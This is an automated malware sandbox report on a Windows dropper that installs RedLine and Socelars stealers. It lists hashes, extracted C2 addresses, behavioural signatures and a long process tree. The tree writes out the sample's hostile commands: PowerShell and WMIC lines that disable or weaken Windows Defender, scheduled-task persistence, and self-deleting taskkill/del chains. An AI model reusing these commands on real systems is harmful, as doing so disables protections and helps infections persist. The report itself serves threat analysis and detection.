Analysis
-
max time kernel
8s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
27/12/2021, 00:11
Static task
static1
Behavioral task
behavioral1
Sample
a485cb752e66e54c92ef00a9ae8f2eba.exe
Resource
win7-en-20211208
General
-
Target
a485cb752e66e54c92ef00a9ae8f2eba.exe
-
Size
6.4MB
-
MD5
a485cb752e66e54c92ef00a9ae8f2eba
-
SHA1
c267fb5e1d5bd1abd6b3d4d4faea91587b600586
-
SHA256
1d7c3a08d1e69e704039850f64a88363fc6c9f3721907aa3c0d8165ae20de3a1
-
SHA512
c8b4a0c892f00a395ad01edcc2798f1ba51c1efe94b7579c5f857277658f6ce18e6da46dfde3969fd1dfc45083de68552b86a8d16658816f2c91c8eec2b278b1
Malware Config
Extracted
socelars
http://www.chosenncrowned.com/
Extracted
redline
userv1
159.69.246.184:13127
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3960 852 rundll32.exe 134 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral2/memory/2292-284-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/2292-285-0x000000000041932A-mapping.dmp family_redline behavioral2/memory/2292-291-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/2292-295-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/3280-339-0x0000000000CF0000-0x0000000000E44000-memory.dmp family_redline -
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000500000001ab38-226.dat family_socelars behavioral2/files/0x000500000001ab38-172.dat family_socelars -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/files/0x000500000001ab30-151.dat WebBrowserPassView behavioral2/files/0x000500000001ab30-191.dat WebBrowserPassView -
Nirsoft 5 IoCs
resource yara_rule behavioral2/files/0x000500000001ab30-151.dat Nirsoft behavioral2/memory/2180-306-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral2/files/0x000500000001ab6a-305.dat Nirsoft behavioral2/files/0x000500000001ab6a-304.dat Nirsoft behavioral2/files/0x000500000001ab30-191.dat Nirsoft -
resource yara_rule behavioral2/files/0x000500000001ab3c-123.dat aspack_v212_v242 behavioral2/files/0x000500000001ab3c-125.dat aspack_v212_v242 behavioral2/files/0x000500000001ab3d-122.dat aspack_v212_v242 behavioral2/files/0x000500000001ab3d-127.dat aspack_v212_v242 behavioral2/files/0x000600000001ab3f-129.dat aspack_v212_v242 behavioral2/files/0x000600000001ab3f-131.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 16 IoCs
pid Process 3816 setup_installer.exe 1792 setup_install.exe 3096 Fri05e80376d7965136.exe 3192 Fri0573cd0e4548.exe 500 Fri05d87299ab2865e.exe 412 Fri053a5ee7e3db.exe 1120 Fri055ab567d9ab89d73.exe 1272 Fri05f64325d01.exe 1444 Fri0510f5b933f.exe 1440 Fri05c25ad4f6fe4.exe 2468 Fri0519054cecb36fc1b.exe 2484 7c5832ae-0a76-4fe3-94c7-2764cb0ce5b5.exe 2648 Fri0550507893048c.exe 2660 Fri0510f5b933f.exe 3968 Fri05cac54300eb.exe 3860 Fri059521701074cbcde.exe -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 6 IoCs
pid Process 1792 setup_install.exe 1792 setup_install.exe 1792 setup_install.exe 1792 setup_install.exe 1792 setup_install.exe 1792 setup_install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 ip-api.com 100 ipinfo.io 101 ipinfo.io 194 ipinfo.io 195 ipinfo.io 250 ipinfo.io 251 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1444 set thread context of 2660 1444 Fri0510f5b933f.exe 117 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
pid pid_target Process procid_target 5916 5456 WerFault.exe 174 5968 3040 WerFault.exe 160 5908 5428 WerFault.exe 171 2364 3040 WerFault.exe 160 4832 3040 WerFault.exe 160 5512 3040 WerFault.exe 160 5412 3040 WerFault.exe 160 5204 3040 WerFault.exe 160 1244 3040 WerFault.exe 160 5896 3040 WerFault.exe 160 3712 3040 WerFault.exe 160 -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5112 schtasks.exe 2372 schtasks.exe 5628 schtasks.exe 4248 schtasks.exe 5832 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 1404 taskkill.exe 1228 taskkill.exe 5468 taskkill.exe 2564 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 1120 Fri055ab567d9ab89d73.exe Token: SeCreateTokenPrivilege 3968 Fri05cac54300eb.exe Token: SeAssignPrimaryTokenPrivilege 3968 Fri05cac54300eb.exe Token: SeLockMemoryPrivilege 3968 Fri05cac54300eb.exe Token: SeIncreaseQuotaPrivilege 3968 Fri05cac54300eb.exe Token: SeMachineAccountPrivilege 3968 Fri05cac54300eb.exe Token: SeTcbPrivilege 3968 Fri05cac54300eb.exe Token: SeSecurityPrivilege 3968 Fri05cac54300eb.exe Token: SeTakeOwnershipPrivilege 3968 Fri05cac54300eb.exe Token: SeLoadDriverPrivilege 3968 Fri05cac54300eb.exe Token: SeSystemProfilePrivilege 3968 Fri05cac54300eb.exe Token: SeSystemtimePrivilege 3968 Fri05cac54300eb.exe Token: SeProfSingleProcessPrivilege 3968 Fri05cac54300eb.exe Token: SeIncBasePriorityPrivilege 3968 Fri05cac54300eb.exe Token: SeCreatePagefilePrivilege 3968 Fri05cac54300eb.exe Token: SeCreatePermanentPrivilege 3968 Fri05cac54300eb.exe Token: SeBackupPrivilege 3968 Fri05cac54300eb.exe Token: SeRestorePrivilege 3968 Fri05cac54300eb.exe Token: SeShutdownPrivilege 3968 Fri05cac54300eb.exe Token: SeDebugPrivilege 3968 Fri05cac54300eb.exe Token: SeAuditPrivilege 3968 Fri05cac54300eb.exe Token: SeSystemEnvironmentPrivilege 3968 Fri05cac54300eb.exe Token: SeChangeNotifyPrivilege 3968 Fri05cac54300eb.exe Token: SeRemoteShutdownPrivilege 3968 Fri05cac54300eb.exe Token: SeUndockPrivilege 3968 Fri05cac54300eb.exe Token: SeSyncAgentPrivilege 3968 Fri05cac54300eb.exe Token: SeEnableDelegationPrivilege 3968 Fri05cac54300eb.exe Token: SeManageVolumePrivilege 3968 Fri05cac54300eb.exe Token: SeImpersonatePrivilege 3968 Fri05cac54300eb.exe Token: SeCreateGlobalPrivilege 3968 Fri05cac54300eb.exe Token: 31 3968 Fri05cac54300eb.exe Token: 32 3968 Fri05cac54300eb.exe Token: 33 3968 Fri05cac54300eb.exe Token: 34 3968 Fri05cac54300eb.exe Token: 35 3968 Fri05cac54300eb.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1628 wrote to memory of 3816 1628 a485cb752e66e54c92ef00a9ae8f2eba.exe 68 PID 1628 wrote to memory of 3816 1628 a485cb752e66e54c92ef00a9ae8f2eba.exe 68 PID 1628 wrote to memory of 3816 1628 a485cb752e66e54c92ef00a9ae8f2eba.exe 68 PID 3816 wrote to memory of 1792 3816 setup_installer.exe 69 PID 3816 wrote to memory of 1792 3816 setup_installer.exe 69 PID 3816 wrote to memory of 1792 3816 setup_installer.exe 69 PID 1792 wrote to memory of 4308 1792 setup_install.exe 72 PID 1792 wrote to memory of 4308 1792 setup_install.exe 72 PID 1792 wrote to memory of 4308 1792 setup_install.exe 72 PID 1792 wrote to memory of 4368 1792 setup_install.exe 73 PID 1792 wrote to memory of 4368 1792 setup_install.exe 73 PID 1792 wrote to memory of 4368 1792 setup_install.exe 73 PID 1792 wrote to memory of 4360 1792 setup_install.exe 74 PID 1792 wrote to memory of 4360 1792 setup_install.exe 74 PID 1792 wrote to memory of 4360 1792 setup_install.exe 74 PID 1792 wrote to memory of 4416 1792 setup_install.exe 75 PID 1792 wrote to memory of 4416 1792 setup_install.exe 75 PID 1792 wrote to memory of 4416 1792 setup_install.exe 75 PID 1792 wrote to memory of 4408 1792 setup_install.exe 76 PID 1792 wrote to memory of 4408 1792 setup_install.exe 76 PID 1792 wrote to memory of 4408 1792 setup_install.exe 76 PID 1792 wrote to memory of 4320 1792 setup_install.exe 77 PID 1792 wrote to memory of 4320 1792 setup_install.exe 77 PID 1792 wrote to memory of 4320 1792 setup_install.exe 77 PID 1792 wrote to memory of 4312 1792 setup_install.exe 78 PID 1792 wrote to memory of 4312 1792 setup_install.exe 78 PID 1792 wrote to memory of 4312 1792 setup_install.exe 78 PID 1792 wrote to memory of 4448 1792 setup_install.exe 79 PID 1792 wrote to memory of 4448 1792 setup_install.exe 79 PID 1792 wrote to memory of 4448 1792 setup_install.exe 79 PID 1792 wrote to memory of 3260 1792 setup_install.exe 132 PID 1792 wrote to memory of 3260 1792 setup_install.exe 132 PID 1792 wrote to memory of 3260 1792 setup_install.exe 132 PID 1792 wrote to memory of 3880 1792 setup_install.exe 80 PID 1792 wrote to memory of 3880 1792 setup_install.exe 80 PID 1792 wrote to memory of 3880 1792 setup_install.exe 80 PID 1792 wrote to memory of 1604 1792 setup_install.exe 131 PID 1792 wrote to memory of 1604 1792 setup_install.exe 131 PID 1792 wrote to memory of 1604 1792 setup_install.exe 131 PID 4360 wrote to memory of 3096 4360 cmd.exe 81 PID 4360 wrote to memory of 3096 4360 cmd.exe 81 PID 4360 wrote to memory of 3096 4360 cmd.exe 81 PID 1792 wrote to memory of 2480 1792 setup_install.exe 130 PID 1792 wrote to memory of 2480 1792 setup_install.exe 130 PID 1792 wrote to memory of 2480 1792 setup_install.exe 130 PID 4416 wrote to memory of 3192 4416 cmd.exe 82 PID 4416 wrote to memory of 3192 4416 cmd.exe 82 PID 4416 wrote to memory of 3192 4416 cmd.exe 82 PID 1792 wrote to memory of 2492 1792 setup_install.exe 129 PID 1792 wrote to memory of 2492 1792 setup_install.exe 129 PID 1792 wrote to memory of 2492 1792 setup_install.exe 129 PID 4312 wrote to memory of 500 4312 cmd.exe 83 PID 4312 wrote to memory of 500 4312 cmd.exe 83 PID 4312 wrote to memory of 500 4312 cmd.exe 83 PID 4308 wrote to memory of 508 4308 cmd.exe 128 PID 4308 wrote to memory of 508 4308 cmd.exe 128 PID 4308 wrote to memory of 508 4308 cmd.exe 128 PID 1792 wrote to memory of 640 1792 setup_install.exe 84 PID 1792 wrote to memory of 640 1792 setup_install.exe 84 PID 1792 wrote to memory of 640 1792 setup_install.exe 84 PID 4368 wrote to memory of 900 4368 cmd.exe 127 PID 4368 wrote to memory of 900 4368 cmd.exe 127 PID 4368 wrote to memory of 900 4368 cmd.exe 127 PID 1792 wrote to memory of 1004 1792 setup_install.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\a485cb752e66e54c92ef00a9ae8f2eba.exe"C:\Users\Admin\AppData\Local\Temp\a485cb752e66e54c92ef00a9ae8f2eba.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵PID:508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05e80376d7965136.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05e80376d7965136.exeFri05e80376d7965136.exe5⤵
- Executes dropped EXE
PID:3096 -
C:\Users\Admin\AppData\Local\Temp\is-BUQME.tmp\Fri05e80376d7965136.tmp"C:\Users\Admin\AppData\Local\Temp\is-BUQME.tmp\Fri05e80376d7965136.tmp" /SL5="$8005E,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05e80376d7965136.exe"6⤵PID:1984
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0573cd0e4548.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0573cd0e4548.exeFri0573cd0e4548.exe5⤵
- Executes dropped EXE
PID:3192 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Fri0573cd0e4548.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0573cd0e4548.exe" & del C:\ProgramData\*.dll & exit6⤵PID:3588
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Fri0573cd0e4548.exe /f7⤵
- Kills process with taskkill
PID:5468
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri053a5ee7e3db.exe4⤵PID:4408
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri053a5ee7e3db.exeFri053a5ee7e3db.exe5⤵
- Executes dropped EXE
PID:412
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri055ab567d9ab89d73.exe4⤵PID:4320
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri055ab567d9ab89d73.exeFri055ab567d9ab89d73.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05d87299ab2865e.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05d87299ab2865e.exeFri05d87299ab2865e.exe5⤵
- Executes dropped EXE
PID:500 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",6⤵PID:4340
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",7⤵PID:3564
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",8⤵PID:1508
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",9⤵PID:5216
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05f64325d01.exe4⤵PID:4448
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05f64325d01.exeFri05f64325d01.exe5⤵
- Executes dropped EXE
PID:1272 -
C:\Users\Admin\AppData\Local\7f7b0dd0-4fdf-452d-aead-f1f911216baa.exe"C:\Users\Admin\AppData\Local\7f7b0dd0-4fdf-452d-aead-f1f911216baa.exe"6⤵PID:4256
-
C:\Users\Admin\AppData\Roaming\40883256\500220240882664.exe"C:\Users\Admin\AppData\Roaming\40883256\500220240882664.exe"7⤵PID:5028
-
-
-
C:\Users\Admin\AppData\Local\2a6edbc5-64c5-4134-9351-b555741cc9bb.exe"C:\Users\Admin\AppData\Local\2a6edbc5-64c5-4134-9351-b555741cc9bb.exe"6⤵PID:3280
-
-
C:\Users\Admin\AppData\Local\f15438d6-566f-4f96-b904-fa72c0c9a3d3.exe"C:\Users\Admin\AppData\Local\f15438d6-566f-4f96-b904-fa72c0c9a3d3.exe"6⤵PID:1908
-
C:\Users\Admin\AppData\Roaming\8313719.exe"C:\Users\Admin\AppData\Roaming\8313719.exe"7⤵PID:4324
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",8⤵PID:4448
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",9⤵PID:2008
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",10⤵PID:4976
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",11⤵PID:5764
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\c43aa6d5-ac06-450b-b812-a2538602be01.exe"C:\Users\Admin\AppData\Local\c43aa6d5-ac06-450b-b812-a2538602be01.exe"6⤵PID:4116
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0510f5b933f.exe /mixtwo4⤵PID:3880
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0510f5b933f.exeFri0510f5b933f.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0573351d0136.exe4⤵PID:640
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0573351d0136.exeFri0573351d0136.exe5⤵PID:4884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0506cb2ead94f.exe4⤵PID:1004
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0506cb2ead94f.exeFri0506cb2ead94f.exe5⤵PID:3932
-
C:\Users\Admin\Pictures\Adobe Films\1_zCZOVXPqmK6ZhxCsSdirPQ.exe"C:\Users\Admin\Pictures\Adobe Films\1_zCZOVXPqmK6ZhxCsSdirPQ.exe"6⤵PID:5032
-
-
C:\Users\Admin\Pictures\Adobe Films\w3vgGIsJDXWLbrdEtxwdxAD5.exe"C:\Users\Admin\Pictures\Adobe Films\w3vgGIsJDXWLbrdEtxwdxAD5.exe"6⤵PID:4352
-
-
C:\Users\Admin\Pictures\Adobe Films\pizGiuqVn7zFmjN5fpg2oAto.exe"C:\Users\Admin\Pictures\Adobe Films\pizGiuqVn7zFmjN5fpg2oAto.exe"6⤵PID:2968
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im pizGiuqVn7zFmjN5fpg2oAto.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\pizGiuqVn7zFmjN5fpg2oAto.exe" & del C:\ProgramData\*.dll & exit7⤵PID:3940
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im pizGiuqVn7zFmjN5fpg2oAto.exe /f8⤵
- Kills process with taskkill
PID:2564
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\T26AeTZg9ROMlIRlpgNdpF85.exe"C:\Users\Admin\Pictures\Adobe Films\T26AeTZg9ROMlIRlpgNdpF85.exe"6⤵PID:3120
-
C:\Users\Admin\Documents\Z7x18hhbn299M11pHMjJKC6t.exe"C:\Users\Admin\Documents\Z7x18hhbn299M11pHMjJKC6t.exe"7⤵PID:2024
-
C:\Users\Admin\Pictures\Adobe Films\rDDBBbWvH5Ax97KNy0JvEMYl.exe"C:\Users\Admin\Pictures\Adobe Films\rDDBBbWvH5Ax97KNy0JvEMYl.exe"8⤵PID:6052
-
-
C:\Users\Admin\Pictures\Adobe Films\tDTIQ3G6R3WOK_z_Rm7_FBZe.exe"C:\Users\Admin\Pictures\Adobe Films\tDTIQ3G6R3WOK_z_Rm7_FBZe.exe"8⤵PID:5300
-
-
C:\Users\Admin\Pictures\Adobe Films\F7el0t34TK4CUBTle9uQqkRi.exe"C:\Users\Admin\Pictures\Adobe Films\F7el0t34TK4CUBTle9uQqkRi.exe"8⤵PID:5412
-
-
C:\Users\Admin\Pictures\Adobe Films\TwV_jQbydUybcucyJ6iyEO0X.exe"C:\Users\Admin\Pictures\Adobe Films\TwV_jQbydUybcucyJ6iyEO0X.exe"8⤵PID:2096
-
-
C:\Users\Admin\Pictures\Adobe Films\yOXB3nkta_SxemuFBpl9wJLa.exe"C:\Users\Admin\Pictures\Adobe Films\yOXB3nkta_SxemuFBpl9wJLa.exe"8⤵PID:5700
-
-
C:\Users\Admin\Pictures\Adobe Films\SKjXe_kPtqrg74xRjf_DgKs7.exe"C:\Users\Admin\Pictures\Adobe Films\SKjXe_kPtqrg74xRjf_DgKs7.exe"8⤵PID:5772
-
-
C:\Users\Admin\Pictures\Adobe Films\PRWbXeG_e49zfrixmPVq8gvD.exe"C:\Users\Admin\Pictures\Adobe Films\PRWbXeG_e49zfrixmPVq8gvD.exe"8⤵PID:1844
-
-
C:\Users\Admin\Pictures\Adobe Films\EUeuyhxSpEl4R4e9nmZ5absb.exe"C:\Users\Admin\Pictures\Adobe Films\EUeuyhxSpEl4R4e9nmZ5absb.exe"8⤵PID:5900
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:2372
-
-
-
C:\Users\Admin\Pictures\Adobe Films\XJ7SXEC77vQckQGIU_GL3Zfn.exe"C:\Users\Admin\Pictures\Adobe Films\XJ7SXEC77vQckQGIU_GL3Zfn.exe"6⤵PID:3040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 6647⤵
- Program crash
PID:5968
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 6847⤵
- Program crash
PID:2364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 6487⤵
- Program crash
PID:4832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 6727⤵
- Program crash
PID:5512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 11287⤵
- Program crash
PID:5412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 11527⤵
- Program crash
PID:5204
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 11647⤵
- Program crash
PID:1244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 12047⤵
- Program crash
PID:5896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 12487⤵
- Program crash
PID:3712
-
-
-
C:\Users\Admin\Pictures\Adobe Films\BT7F_kmCMbgKkDFJccuR4z3Y.exe"C:\Users\Admin\Pictures\Adobe Films\BT7F_kmCMbgKkDFJccuR4z3Y.exe"6⤵PID:3252
-
-
C:\Users\Admin\Pictures\Adobe Films\nG2X8jGYVrEUxz6iT84iWF2O.exe"C:\Users\Admin\Pictures\Adobe Films\nG2X8jGYVrEUxz6iT84iWF2O.exe"6⤵PID:3080
-
-
C:\Users\Admin\Pictures\Adobe Films\pYRT_dCZOM5p5OZbCGX6CKLq.exe"C:\Users\Admin\Pictures\Adobe Films\pYRT_dCZOM5p5OZbCGX6CKLq.exe"6⤵PID:3096
-
C:\Users\Admin\AppData\Local\ab97ab4e-78b4-436a-a485-402b911fbaaa.exe"C:\Users\Admin\AppData\Local\ab97ab4e-78b4-436a-a485-402b911fbaaa.exe"7⤵PID:4380
-
-
C:\Users\Admin\AppData\Local\c09b64db-2e1a-4915-b84d-e2ab5ac5d552.exe"C:\Users\Admin\AppData\Local\c09b64db-2e1a-4915-b84d-e2ab5ac5d552.exe"7⤵PID:3680
-
-
C:\Users\Admin\AppData\Local\d10271ea-457f-4556-92e0-79e8095b8cfa.exe"C:\Users\Admin\AppData\Local\d10271ea-457f-4556-92e0-79e8095b8cfa.exe"7⤵PID:1088
-
-
C:\Users\Admin\AppData\Local\a357f801-3c88-4b94-9bf3-404a9f0e16d3.exe"C:\Users\Admin\AppData\Local\a357f801-3c88-4b94-9bf3-404a9f0e16d3.exe"7⤵PID:4956
-
C:\Users\Admin\AppData\Roaming\7111090.exe"C:\Users\Admin\AppData\Roaming\7111090.exe"8⤵PID:1228
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",9⤵PID:1660
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",10⤵PID:1712
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\YxrFKSlebSAGFqC7TPFcGLBl.exe"C:\Users\Admin\Pictures\Adobe Films\YxrFKSlebSAGFqC7TPFcGLBl.exe"6⤵PID:1672
-
-
C:\Users\Admin\Pictures\Adobe Films\g4UUpKssKWXdqLOan6IOwaKf.exe"C:\Users\Admin\Pictures\Adobe Films\g4UUpKssKWXdqLOan6IOwaKf.exe"6⤵PID:4956
-
-
C:\Users\Admin\Pictures\Adobe Films\j4mXixRkNIxqO2p2ngZgWGTY.exe"C:\Users\Admin\Pictures\Adobe Films\j4mXixRkNIxqO2p2ngZgWGTY.exe"6⤵PID:68
-
-
C:\Users\Admin\Pictures\Adobe Films\UNuXqLGbReKTbayd8HYIArIf.exe"C:\Users\Admin\Pictures\Adobe Films\UNuXqLGbReKTbayd8HYIArIf.exe"6⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\7zSC59E.tmp\Install.exe.\Install.exe7⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\7zSE635.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵PID:5268
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵PID:1876
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵PID:5960
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:4660
-
